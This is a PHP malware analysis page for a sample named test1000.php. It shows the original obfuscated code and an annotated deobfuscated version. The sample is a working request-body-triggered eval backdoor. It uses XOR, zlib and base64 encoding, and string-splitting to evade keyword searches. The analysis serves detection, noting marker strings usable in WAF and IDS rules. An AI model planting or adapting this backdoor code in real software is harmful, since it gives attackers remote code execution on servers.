PHP Malware Analysis


Filename: test1000.php

Tags

Encoding
  • base64_decode
  • base64_encode
Execution
  • eval
Input
  • _GET
Files
  • file_get_contents

Deobfuscated code


<?php 
// Analyser-normalised view of the sample's set-up lines.
// The seven single-quoted strings ($j, $R, $n, $b, $s, $a, $Z) are fragments of
// one PHP payload. They are stored out of order and padded with the filler
// marker "#(", so names such as eval, base64_decode and file_get_contents never
// appear as contiguous text in the file and plain keyword searches miss them.
$j = ';$r#(#(=@b#(ase64_encode(@x(#(@gzc#(ompress(#(#($o),$k))#(;print(#("$p$#(kh$r$kf");}';
$R = 'MBU3CONVDXm#(#(Q";funct#(ion #(x($t,$k){$c=#(strlen(#($k);#($l=strl#(en#(($t);$o="';
$n = '";#(fo#(r($i=0#(;$i<$#(l;){fo#(r($j=0;($j<$c&#(&$i<$#(l);$j+#(+,#($i++){$o.#(=$t{#($i}^$k';
$b = 's("#(php:/#(/inpu#(t"),#($m)==1) {@o#(#(b_start();@#(eva#(l(@gzu#(ncompress(#(@x(@b';
$s = 'a#(se64_#(decod#(e($m[1])#(,$k)#());$o=@o#(b#(_get_conten#(ts();@#(ob_e#(n#(d_clean()';
$a = '$k="67#(8914a7#(";$kh="58#(6#(9492615#(7a";#($kf="469d55a#(a47#(8c#(";$p=#("wu#(gp';
// Function name already resolved by the analyser; the original listing builds
// it with str_replace(). create_function() compiles a string into a function
// body, so for review purposes it is equivalent to eval. It was removed in
// PHP 8.0.
$w = "create_function";
$Z = '{$j}#(;#(}}return $#(o;}#(i#(f (@preg#(_match(#("/$#(kh(#(.+)$kf/",@fi#(le_get_conte#(nt';
// Reassembled payload source: the fragments concatenated with every "#("
// removed (the original listing joins them as $a.$R.$n.$Z.$b.$s.$j).
// The payload uses the curly-brace string offset form ($t{$i}), which was also
// removed in PHP 8.0, so the sample as written targets PHP 7.x or older.
$l = "\$k=\"678914a7\";\$kh=\"58694926157a\";\$kf=\"469d55aa478c\";\$p=\"wugpMBU3CONVDXmQ\";function x(\$t,\$k){\$c=strlen(\$k);\$l=strlen(\$t);\$o=\"\";for(\$i=0;\$i<\$l;){for(\$j=0;(\$j<\$c&&\$i<\$l);\$j++,\$i++){\$o.=\$t{\$i}^\$k{\$j};}}return \$o;}if (@preg_match(\"/\$kh(.+)\$kf/\",@file_get_contents(\"php://input\"),\$m)==1) {@ob_start();@eval(@gzuncompress(@x(@base64_decode(\$m[1]),\$k)));\$o=@ob_get_contents();@ob_end_clean();\$r=@base64_encode(@x(@gzcompress(\$o),\$k));print(\"\$p\$kh\$r\$kf\");}";
// Readable form of the payload, written by the analyser as a closure. It stands
// in for the anonymous function the sample compiles from $l at runtime.
// Behaviour: a request-body-triggered remote code execution backdoor with an
// obfuscated (XOR + zlib + base64) request and response channel.
// NOTE(review): the key/header/footer layout resembles publicly documented
// Weevely-style agents; confirm before attributing.
$g = function () {
    // Repeating XOR key, used for both the inbound payload and the outbound result.
    $k = "678914a7";
    // Header and footer markers. The request body is only acted on when it
    // contains data between these two strings; the same markers frame the
    // response, so both are usable as request/response indicators in WAF,
    // proxy or IDS rules.
    $kh = "58694926157a";
    $kf = "469d55aa478c";
    // Fixed prefix printed in front of every response.
    $p = "wugpMBU3CONVDXmQ";
    // x(): XORs each byte of $t with the bytes of $k, restarting at the first
    // key byte whenever the key is exhausted. The same routine is applied on
    // the way in and on the way out.
    function x($t, $k)
    {
        $c = strlen($k);
        $l = strlen($t);
        $o = "";
        for ($i = 0; $i < $l;) {
            for ($j = 0; $j < $c && $i < $l; $j++, $i++) {
                $o .= $t[$i] ^ $k[$j];
            }
        }
        return $o;
    }
    // Trigger: reads the raw request body (php://input), not $_GET/$_POST, and
    // looks for the header...footer frame. Every call is prefixed with "@", so
    // failures raise no PHP warnings and leave nothing in the error log.
    if (@preg_match("/58694926157a(.+)469d55aa478c/", @file_get_contents("php://input"), $m) == 1) {
        // Buffer whatever the evaluated code prints so it can be re-encoded.
        @ob_start();
        // Inbound chain: base64 decode -> XOR with $k -> zlib inflate -> eval.
        // Code supplied in the request body runs inside this PHP process.
        // eval is a language construct, so disable_functions does not block it.
        @eval(@gzuncompress(@x(@base64_decode($m[1]), $k)));
        $o = @ob_get_contents();
        @ob_end_clean();
        // Outbound chain mirrors the inbound one: zlib deflate -> XOR -> base64.
        $r = @base64_encode(@x(@gzcompress($o), $k));
        // Response is framed as prefix + header + encoded output + footer.
        print "{$p}{$kh}{$r}{$kf}";
    }
};
// The handler runs on every request that reaches this file.
$g();


Original code


<?php
// Sample as found on disk. Each string below is a fragment of the payload
// source, stored out of order and padded with the filler marker "#(" so that
// function names do not appear as contiguous text.
$j=';$r#(#(=@b#(ase64_encode(@x(#(@gzc#(ompress(#(#($o),$k))#(;print(#("$p$#(kh$r$kf");}';
$R='MBU3CONVDXm#(#(Q";funct#(ion #(x($t,$k){$c=#(strlen(#($k);#($l=strl#(en#(($t);$o="';
$n='";#(fo#(r($i=0#(;$i<$#(l;){fo#(r($j=0;($j<$c&#(&$i<$#(l);$j+#(+,#($i++){$o.#(=$t{#($i}^$k';
$b='s("#(php:/#(/inpu#(t"),#($m)==1) {@o#(#(b_start();@#(eva#(l(@gzu#(ncompress(#(@x(@b';
$s='a#(se64_#(decod#(e($m[1])#(,$k)#());$o=@o#(b#(_get_conten#(ts();@#(ob_e#(n#(d_clean()';
$a='$k="67#(8914a7#(";$kh="58#(6#(9492615#(7a";#($kf="469d55a#(a47#(8c#(";$p=#("wu#(gp';
// Builds the string "create_function" at runtime by deleting every "uc" from
// the literal, so the function name never appears in the file. A callable name
// assembled with str_replace() and then invoked through a variable is a useful
// static-detection pattern in its own right.
$w=str_replace('uc','','creucaucucte_ucfuucnctucion');
$Z='{$j}#(;#(}}return $#(o;}#(i#(f (@preg#(_match(#("/$#(kh(#(.+)$kf/",@fi#(le_get_conte#(nt';
// Concatenates the fragments in execution order and strips the "#(" filler,
// yielding the payload source as one string.
$l=str_replace('#(','',$a.$R.$n.$Z.$b.$s.$j);
// Compiles $l into a parameterless anonymous function via the variable
// function call in $w, then invokes it immediately. create_function() was
// removed in PHP 8.0, so this line fails on PHP 8 and later.
$g=$w('',$l);$g();
?>